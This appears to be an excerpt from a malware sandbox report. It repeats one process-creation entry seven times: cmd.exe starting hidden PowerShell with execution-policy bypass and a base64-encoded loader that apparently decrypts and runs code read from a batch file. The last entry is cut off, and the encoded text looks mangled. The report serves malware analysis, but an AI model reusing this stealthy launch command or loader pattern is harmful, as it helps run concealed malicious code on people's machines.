Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('jhvzzxjoyw1lid0gjgvudjpvu0vstkfnrtskcgxwcwwgpsaiqzpcvxnlcnncjhvzzxjoyw1lxgr3bs5iyxqio2lmichuzxn0lvbhdgggjhbschfsksb7icagifdyaxrlluhvc3qgikjhdgnoigzpbgugzm91bmq6icrwbhbxbcigluzvcmvncm91bmrdb2xvcibdewfuoyagicakzmlszuxpbmvzid0gw1n5c3rlbs5jty5gawxlxto6umvhzefsbexpbmvzkcrwbhbxbcwgw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgock7icagigzvcmvhy2ggkcrsaw5ligluicrmawxltgluzxmpihsgicagicagiglmicgkbgluzsatbwf0y2ggj146ojogpygukykkjykgeyagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrldgvjdgvkigluihrozsbiyxrjacbmawxlliigluzvcmvncm91bmrdb2xvcibdewfuoyagicagicagicagihryesb7icagicagicagicagicagicrkzwnvzgvkqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrtyxrjagvzwzfdllryaw0oksk7icagicagicagicagicagicrpbmply3rpb25db2rlid0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vw5py29kzs5hzxrtdhjpbmcojgrly29kzwrcexrlcyk7icagicagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrly29kzwqgc3vjy2vzc2z1bgx5liigluzvcmvncm91bmrdb2xvcibhcmvlbjsgicagicagicagicagicagv3jpdgutsg9zdcairxhly3v0aw5nigluamvjdglvbibjb2rlli4uiiatrm9yzwdyb3vuzenvbg9yifllbgxvdzsgicagicagicagicagicagsw52b2tlluv4chjlc3npb24gjgluamvjdglvbknvzgu7icagicagicagicagicagigjyzwfroyagicagicagicagih0gy2f0y2ggeyagicagicagicagicagicbxcml0zs1ib3n0icjfcnjvcibkdxjpbmcgzgvjb2rpbmcgb3igzxhly3v0aw5nigluamvjdglvbibjb2rloiakxyigluzvcmvncm91bmrdb2xvcibszwq7icagicagicagicagftsgicagicagih07icagih07fsblbhnlihsgicagicbxcml0zs1ib3n0icjtexn0zw0grxjyb3i6iejhdgnoigzpbgugbm90igzvdw5koiakcgxwcwwiic1gb3jlz3jvdw5kq29sb3igumvkoyagicblegl0o307znvuy3rpb24gemr0z3qojhbhcmftx3zhcil7csrhzxnfdmfypvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lkflc106oknyzwf0zsgpowkkywvzx3zhci5nb2rlpvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lknpcghlck1vzgvdojpdqkm7csrhzxnfdmfyllbhzgrpbmc9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuugfkzgluz01vzgvdojpqs0ntnzsjjgflc192yxius2v5pvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj3nyegtusgezmevib3gxcmd2ykdoyzjnrnpwqvluy1hese1sqmfsq0x1cgm9jyk7csrhzxnfdmfylklwpvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj0l5cnlfvjrzovmzvmdwu3fxq2lpb0e9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gahrkdxmojhbhcmftx3zhcil7csrrdhlxdz1ozxctt2jqzwn0ifn5c3rlbs5jty5nzw1vcnltdhjlyw0olcrwyxjhbv92yxipowkkamxwbme9tmv3lu9iamvjdcbtexn0zw0usu8utwvtb3j5u3ryzwftowkkb3hmzwk9tmv3lu9iamvjdcbtexn0zw0usu8uq29tchjlc3npb24ur1ppcfn0cmvhbsgka3r5cxcsiftjty5db21wcmvzc2lvbi5db21wcmvzc2lvbk1vzgvdojpezwnvbxbyzxnzktsjjg94zmvplknvchlubygkamxwbmepowkkb3hmzwkurglzcg9zzsgpowkka3r5cxcurglzcg9zzsgpowkkamxwbmeurglzcg9zzsgpowkkamxwbmeuvg9bcnjhesgpo31mdw5jdglvbib2bwv1ccgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjjhvxzw1ipvttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06oignzgfvtcd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('jhvzzxjoyw1lid0gjgvudjpvu0vstkfnrtskcgxwcwwgpsaiqzpcvxnlcnncjhvzzxjoyw1lxgr3bs5iyxqio2lmichuzxn0lvbhdgggjhbschfsksb7icagifdyaxrlluhvc3qgikjhdgnoigzpbgugzm91bmq6icrwbhbxbcigluzvcmvncm91bmrdb2xvcibdewfuoyagicakzmlszuxpbmvzid0gw1n5c3rlbs5jty5gawxlxto6umvhzefsbexpbmvzkcrwbhbxbcwgw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgock7icagigzvcmvhy2ggkcrsaw5ligluicrmawxltgluzxmpihsgicagicagiglmicgkbgluzsatbwf0y2ggj146ojogpygukykkjykgeyagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrldgvjdgvkigluihrozsbiyxrjacbmawxlliigluzvcmvncm91bmrdb2xvcibdewfuoyagicagicagicagihryesb7icagicagicagicagicagicrkzwnvzgvkqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrtyxrjagvzwzfdllryaw0oksk7icagicagicagicagicagicrpbmply3rpb25db2rlid0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vw5py29kzs5hzxrtdhjpbmcojgrly29kzwrcexrlcyk7icagicagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrly29kzwqgc3vjy2vzc2z1bgx5liigluzvcmvncm91bmrdb2xvcibhcmvlbjsgicagicagicagicagicagv3jpdgutsg9zdcairxhly3v0aw5nigluamvjdglvbibjb2rlli4uiiatrm9yzwdyb3vuzenvbg9yifllbgxvdzsgicagicagicagicagicagsw52b2tlluv4chjlc3npb24gjgluamvjdglvbknvzgu7icagicagicagicagicagigjyzwfroyagicagicagicagih0gy2f0y2ggeyagicagicagicagicagicbxcml0zs1ib3n0icjfcnjvcibkdxjpbmcgzgvjb2rpbmcgb3igzxhly3v0aw5nigluamvjdglvbibjb2rloiakxyigluzvcmvncm91bmrdb2xvcibszwq7icagicagicagicagftsgicagicagih07icagih07fsblbhnlihsgicagicbxcml0zs1ib3n0icjtexn0zw0grxjyb3i6iejhdgnoigzpbgugbm90igzvdw5koiakcgxwcwwiic1gb3jlz3jvdw5kq29sb3igumvkoyagicblegl0o307znvuy3rpb24gemr0z3qojhbhcmftx3zhcil7csrhzxnfdmfypvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lkflc106oknyzwf0zsgpowkkywvzx3zhci5nb2rlpvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lknpcghlck1vzgvdojpdqkm7csrhzxnfdmfyllbhzgrpbmc9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuugfkzgluz01vzgvdojpqs0ntnzsjjgflc192yxius2v5pvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj3nyegtusgezmevib3gxcmd2ykdoyzjnrnpwqvluy1hese1sqmfsq0x1cgm9jyk7csrhzxnfdmfylklwpvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj0l5cnlfvjrzovmzvmdwu3fxq2lpb0e9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gahrkdxmojhbhcmftx3zhcil7csrrdhlxdz1ozxctt2jqzwn0ifn5c3rlbs5jty5nzw1vcnltdhjlyw0olcrwyxjhbv92yxipowkkamxwbme9tmv3lu9iamvjdcbtexn0zw0usu8utwvtb3j5u3ryzwftowkkb3hmzwk9tmv3lu9iamvjdcbtexn0zw0usu8uq29tchjlc3npb24ur1ppcfn0cmvhbsgka3r5cxcsiftjty5db21wcmvzc2lvbi5db21wcmvzc2lvbk1vzgvdojpezwnvbxbyzxnzktsjjg94zmvplknvchlubygkamxwbmepowkkb3hmzwkurglzcg9zzsgpowkka3r5cxcurglzcg9zzsgpowkkamxwbmeurglzcg9zzsgpowkkamxwbmeuvg9bcnjhesgpo31mdw5jdglvbib2bwv1ccgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjjhvxzw1ipvttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06oignzgfvtcd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('jhvzzxjoyw1lid0gjgvudjpvu0vstkfnrtskcgxwcwwgpsaiqzpcvxnlcnncjhvzzxjoyw1lxgr3bs5iyxqio2lmichuzxn0lvbhdgggjhbschfsksb7icagifdyaxrlluhvc3qgikjhdgnoigzpbgugzm91bmq6icrwbhbxbcigluzvcmvncm91bmrdb2xvcibdewfuoyagicakzmlszuxpbmvzid0gw1n5c3rlbs5jty5gawxlxto6umvhzefsbexpbmvzkcrwbhbxbcwgw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgock7icagigzvcmvhy2ggkcrsaw5ligluicrmawxltgluzxmpihsgicagicagiglmicgkbgluzsatbwf0y2ggj146ojogpygukykkjykgeyagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrldgvjdgvkigluihrozsbiyxrjacbmawxlliigluzvcmvncm91bmrdb2xvcibdewfuoyagicagicagicagihryesb7icagicagicagicagicagicrkzwnvzgvkqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrtyxrjagvzwzfdllryaw0oksk7icagicagicagicagicagicrpbmply3rpb25db2rlid0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vw5py29kzs5hzxrtdhjpbmcojgrly29kzwrcexrlcyk7icagicagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrly29kzwqgc3vjy2vzc2z1bgx5liigluzvcmvncm91bmrdb2xvcibhcmvlbjsgicagicagicagicagicagv3jpdgutsg9zdcairxhly3v0aw5nigluamvjdglvbibjb2rlli4uiiatrm9yzwdyb3vuzenvbg9yifllbgxvdzsgicagicagicagicagicagsw52b2tlluv4chjlc3npb24gjgluamvjdglvbknvzgu7icagicagicagicagicagigjyzwfroyagicagicagicagih0gy2f0y2ggeyagicagicagicagicagicbxcml0zs1ib3n0icjfcnjvcibkdxjpbmcgzgvjb2rpbmcgb3igzxhly3v0aw5nigluamvjdglvbibjb2rloiakxyigluzvcmvncm91bmrdb2xvcibszwq7icagicagicagicagftsgicagicagih07icagih07fsblbhnlihsgicagicbxcml0zs1ib3n0icjtexn0zw0grxjyb3i6iejhdgnoigzpbgugbm90igzvdw5koiakcgxwcwwiic1gb3jlz3jvdw5kq29sb3igumvkoyagicblegl0o307znvuy3rpb24gemr0z3qojhbhcmftx3zhcil7csrhzxnfdmfypvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lkflc106oknyzwf0zsgpowkkywvzx3zhci5nb2rlpvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lknpcghlck1vzgvdojpdqkm7csrhzxnfdmfyllbhzgrpbmc9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuugfkzgluz01vzgvdojpqs0ntnzsjjgflc192yxius2v5pvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj3nyegtusgezmevib3gxcmd2ykdoyzjnrnpwqvluy1hese1sqmfsq0x1cgm9jyk7csrhzxnfdmfylklwpvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj0l5cnlfvjrzovmzvmdwu3fxq2lpb0e9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gahrkdxmojhbhcmftx3zhcil7csrrdhlxdz1ozxctt2jqzwn0ifn5c3rlbs5jty5nzw1vcnltdhjlyw0olcrwyxjhbv92yxipowkkamxwbme9tmv3lu9iamvjdcbtexn0zw0usu8utwvtb3j5u3ryzwftowkkb3hmzwk9tmv3lu9iamvjdcbtexn0zw0usu8uq29tchjlc3npb24ur1ppcfn0cmvhbsgka3r5cxcsiftjty5db21wcmvzc2lvbi5db21wcmvzc2lvbk1vzgvdojpezwnvbxbyzxnzktsjjg94zmvplknvchlubygkamxwbmepowkkb3hmzwkurglzcg9zzsgpowkka3r5cxcurglzcg9zzsgpowkkamxwbmeurglzcg9zzsgpowkkamxwbmeuvg9bcnjhesgpo31mdw5jdglvbib2bwv1ccgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjjhvxzw1ipvttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06oignzgfvtcd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('jhvzzxjoyw1lid0gjgvudjpvu0vstkfnrtskcgxwcwwgpsaiqzpcvxnlcnncjhvzzxjoyw1lxgr3bs5iyxqio2lmichuzxn0lvbhdgggjhbschfsksb7icagifdyaxrlluhvc3qgikjhdgnoigzpbgugzm91bmq6icrwbhbxbcigluzvcmvncm91bmrdb2xvcibdewfuoyagicakzmlszuxpbmvzid0gw1n5c3rlbs5jty5gawxlxto6umvhzefsbexpbmvzkcrwbhbxbcwgw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgock7icagigzvcmvhy2ggkcrsaw5ligluicrmawxltgluzxmpihsgicagicagiglmicgkbgluzsatbwf0y2ggj146ojogpygukykkjykgeyagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrldgvjdgvkigluihrozsbiyxrjacbmawxlliigluzvcmvncm91bmrdb2xvcibdewfuoyagicagicagicagihryesb7icagicagicagicagicagicrkzwnvzgvkqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrtyxrjagvzwzfdllryaw0oksk7icagicagicagicagicagicrpbmply3rpb25db2rlid0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vw5py29kzs5hzxrtdhjpbmcojgrly29kzwrcexrlcyk7icagicagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrly29kzwqgc3vjy2vzc2z1bgx5liigluzvcmvncm91bmrdb2xvcibhcmvlbjsgicagicagicagicagicagv3jpdgutsg9zdcairxhly3v0aw5nigluamvjdglvbibjb2rlli4uiiatrm9yzwdyb3vuzenvbg9yifllbgxvdzsgicagicagicagicagicagsw52b2tlluv4chjlc3npb24gjgluamvjdglvbknvzgu7icagicagicagicagicagigjyzwfroyagicagicagicagih0gy2f0y2ggeyagicagicagicagicagicbxcml0zs1ib3n0icjfcnjvcibkdxjpbmcgzgvjb2rpbmcgb3igzxhly3v0aw5nigluamvjdglvbibjb2rloiakxyigluzvcmvncm91bmrdb2xvcibszwq7icagicagicagicagftsgicagicagih07icagih07fsblbhnlihsgicagicbxcml0zs1ib3n0icjtexn0zw0grxjyb3i6iejhdgnoigzpbgugbm90igzvdw5koiakcgxwcwwiic1gb3jlz3jvdw5kq29sb3igumvkoyagicblegl0o307znvuy3rpb24gemr0z3qojhbhcmftx3zhcil7csrhzxnfdmfypvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lkflc106oknyzwf0zsgpowkkywvzx3zhci5nb2rlpvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lknpcghlck1vzgvdojpdqkm7csrhzxnfdmfyllbhzgrpbmc9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuugfkzgluz01vzgvdojpqs0ntnzsjjgflc192yxius2v5pvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj3nyegtusgezmevib3gxcmd2ykdoyzjnrnpwqvluy1hese1sqmfsq0x1cgm9jyk7csrhzxnfdmfylklwpvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj0l5cnlfvjrzovmzvmdwu3fxq2lpb0e9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gahrkdxmojhbhcmftx3zhcil7csrrdhlxdz1ozxctt2jqzwn0ifn5c3rlbs5jty5nzw1vcnltdhjlyw0olcrwyxjhbv92yxipowkkamxwbme9tmv3lu9iamvjdcbtexn0zw0usu8utwvtb3j5u3ryzwftowkkb3hmzwk9tmv3lu9iamvjdcbtexn0zw0usu8uq29tchjlc3npb24ur1ppcfn0cmvhbsgka3r5cxcsiftjty5db21wcmvzc2lvbi5db21wcmvzc2lvbk1vzgvdojpezwnvbxbyzxnzktsjjg94zmvplknvchlubygkamxwbmepowkkb3hmzwkurglzcg9zzsgpowkka3r5cxcurglzcg9zzsgpowkkamxwbmeurglzcg9zzsgpowkkamxwbmeuvg9bcnjhesgpo31mdw5jdglvbib2bwv1ccgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjjhvxzw1ipvttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06oignzgfvtcd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('jhvzzxjoyw1lid0gjgvudjpvu0vstkfnrtskcgxwcwwgpsaiqzpcvxnlcnncjhvzzxjoyw1lxgr3bs5iyxqio2lmichuzxn0lvbhdgggjhbschfsksb7icagifdyaxrlluhvc3qgikjhdgnoigzpbgugzm91bmq6icrwbhbxbcigluzvcmvncm91bmrdb2xvcibdewfuoyagicakzmlszuxpbmvzid0gw1n5c3rlbs5jty5gawxlxto6umvhzefsbexpbmvzkcrwbhbxbcwgw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgock7icagigzvcmvhy2ggkcrsaw5ligluicrmawxltgluzxmpihsgicagicagiglmicgkbgluzsatbwf0y2ggj146ojogpygukykkjykgeyagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrldgvjdgvkigluihrozsbiyxrjacbmawxlliigluzvcmvncm91bmrdb2xvcibdewfuoyagicagicagicagihryesb7icagicagicagicagicagicrkzwnvzgvkqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrtyxrjagvzwzfdllryaw0oksk7icagicagicagicagicagicrpbmply3rpb25db2rlid0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vw5py29kzs5hzxrtdhjpbmcojgrly29kzwrcexrlcyk7icagicagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrly29kzwqgc3vjy2vzc2z1bgx5liigluzvcmvncm91bmrdb2xvcibhcmvlbjsgicagicagicagicagicagv3jpdgutsg9zdcairxhly3v0aw5nigluamvjdglvbibjb2rlli4uiiatrm9yzwdyb3vuzenvbg9yifllbgxvdzsgicagicagicagicagicagsw52b2tlluv4chjlc3npb24gjgluamvjdglvbknvzgu7icagicagicagicagicagigjyzwfroyagicagicagicagih0gy2f0y2ggeyagicagicagicagicagicbxcml0zs1ib3n0icjfcnjvcibkdxjpbmcgzgvjb2rpbmcgb3igzxhly3v0aw5nigluamvjdglvbibjb2rloiakxyigluzvcmvncm91bmrdb2xvcibszwq7icagicagicagicagftsgicagicagih07icagih07fsblbhnlihsgicagicbxcml0zs1ib3n0icjtexn0zw0grxjyb3i6iejhdgnoigzpbgugbm90igzvdw5koiakcgxwcwwiic1gb3jlz3jvdw5kq29sb3igumvkoyagicblegl0o307znvuy3rpb24gemr0z3qojhbhcmftx3zhcil7csrhzxnfdmfypvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lkflc106oknyzwf0zsgpowkkywvzx3zhci5nb2rlpvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lknpcghlck1vzgvdojpdqkm7csrhzxnfdmfyllbhzgrpbmc9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuugfkzgluz01vzgvdojpqs0ntnzsjjgflc192yxius2v5pvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj3nyegtusgezmevib3gxcmd2ykdoyzjnrnpwqvluy1hese1sqmfsq0x1cgm9jyk7csrhzxnfdmfylklwpvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj0l5cnlfvjrzovmzvmdwu3fxq2lpb0e9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gahrkdxmojhbhcmftx3zhcil7csrrdhlxdz1ozxctt2jqzwn0ifn5c3rlbs5jty5nzw1vcnltdhjlyw0olcrwyxjhbv92yxipowkkamxwbme9tmv3lu9iamvjdcbtexn0zw0usu8utwvtb3j5u3ryzwftowkkb3hmzwk9tmv3lu9iamvjdcbtexn0zw0usu8uq29tchjlc3npb24ur1ppcfn0cmvhbsgka3r5cxcsiftjty5db21wcmvzc2lvbi5db21wcmvzc2lvbk1vzgvdojpezwnvbxbyzxnzktsjjg94zmvplknvchlubygkamxwbmepowkkb3hmzwkurglzcg9zzsgpowkka3r5cxcurglzcg9zzsgpowkkamxwbmeurglzcg9zzsgpowkkamxwbmeuvg9bcnjhesgpo31mdw5jdglvbib2bwv1ccgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjjhvxzw1ipvttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06oignzgfvtcd			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('jhvzzxjoyw1lid0gjgvudjpvu0vstkfnrtskcgxwcwwgpsaiqzpcvxnlcnncjhvzzxjoyw1lxgr3bs5iyxqio2lmichuzxn0lvbhdgggjhbschfsksb7icagifdyaxrlluhvc3qgikjhdgnoigzpbgugzm91bmq6icrwbhbxbcigluzvcmvncm91bmrdb2xvcibdewfuoyagicakzmlszuxpbmvzid0gw1n5c3rlbs5jty5gawxlxto6umvhzefsbexpbmvzkcrwbhbxbcwgw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgock7icagigzvcmvhy2ggkcrsaw5ligluicrmawxltgluzxmpihsgicagicagiglmicgkbgluzsatbwf0y2ggj146ojogpygukykkjykgeyagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrldgvjdgvkigluihrozsbiyxrjacbmawxlliigluzvcmvncm91bmrdb2xvcibdewfuoyagicagicagicagihryesb7icagicagicagicagicagicrkzwnvzgvkqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrtyxrjagvzwzfdllryaw0oksk7icagicagicagicagicagicrpbmply3rpb25db2rlid0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vw5py29kzs5hzxrtdhjpbmcojgrly29kzwrcexrlcyk7icagicagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrly29kzwqgc3vjy2vzc2z1bgx5liigluzvcmvncm91bmrdb2xvcibhcmvlbjsgicagicagicagicagicagv3jpdgutsg9zdcairxhly3v0aw5nigluamvjdglvbibjb2rlli4uiiatrm9yzwdyb3vuzenvbg9yifllbgxvdzsgicagicagicagicagicagsw52b2tlluv4chjlc3npb24gjgluamvjdglvbknvzgu7icagicagicagicagicagigjyzwfroyagicagicagicagih0gy2f0y2ggeyagicagicagicagicagicbxcml0zs1ib3n0icjfcnjvcibkdxjpbmcgzgvjb2rpbmcgb3igzxhly3v0aw5nigluamvjdglvbibjb2rloiakxyigluzvcmvncm91bmrdb2xvcibszwq7icagicagicagicagftsgicagicagih07icagih07fsblbhnlihsgicagicbxcml0zs1ib3n0icjtexn0zw0grxjyb3i6iejhdgnoigzpbgugbm90igzvdw5koiakcgxwcwwiic1gb3jlz3jvdw5kq29sb3igumvkoyagicblegl0o307znvuy3rpb24gemr0z3qojhbhcmftx3zhcil7csrhzxnfdmfypvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lkflc106oknyzwf0zsgpowkkywvzx3zhci5nb2rlpvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lknpcghlck1vzgvdojpdqkm7csrhzxnfdmfyllbhzgrpbmc9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuugfkzgluz01vzgvdojpqs0ntnzsjjgflc192yxius2v5pvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj3nyegtusgezmevib3gxcmd2ykdoyzjnrnpwqvluy1hese1sqmfsq0x1cgm9jyk7csrhzxnfdmfylklwpvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj0l5cnlfvjrzovmzvmdwu3fxq2lpb0e9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gahrkdxmojhbhcmftx3zhcil7csrrdhlxdz1ozxctt2jqzwn0ifn5c3rlbs5jty5nzw1vcnltdhjlyw0olcrwyxjhbv92yxipowkkamxwbme9tmv3lu9iamvjdcbtexn0zw0usu8utwvtb3j5u3ryzwftowkkb3hmzwk9tmv3lu9iamvjdcbtexn0zw0usu8uq29tchjlc3npb24ur1ppcfn0cmvhbsgka3r5cxcsiftjty5db21wcmvzc2lvbi5db21wcmvzc2lvbk1vzgvdojpezwnvbxbyzxnzktsjjg94zmvplknvchlubygkamxwbmepowkkb3hmzwkurglzcg9zzsgpowkka3r5cxcurglzcg9zzsgpowkkamxwbmeurglzcg9zzsgpowkkamxwbmeuvg9bcnjhesgpo31mdw5jdglvbib2bwv1ccgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjjhvxzw1ipvttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06oignzgfvtcd			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command 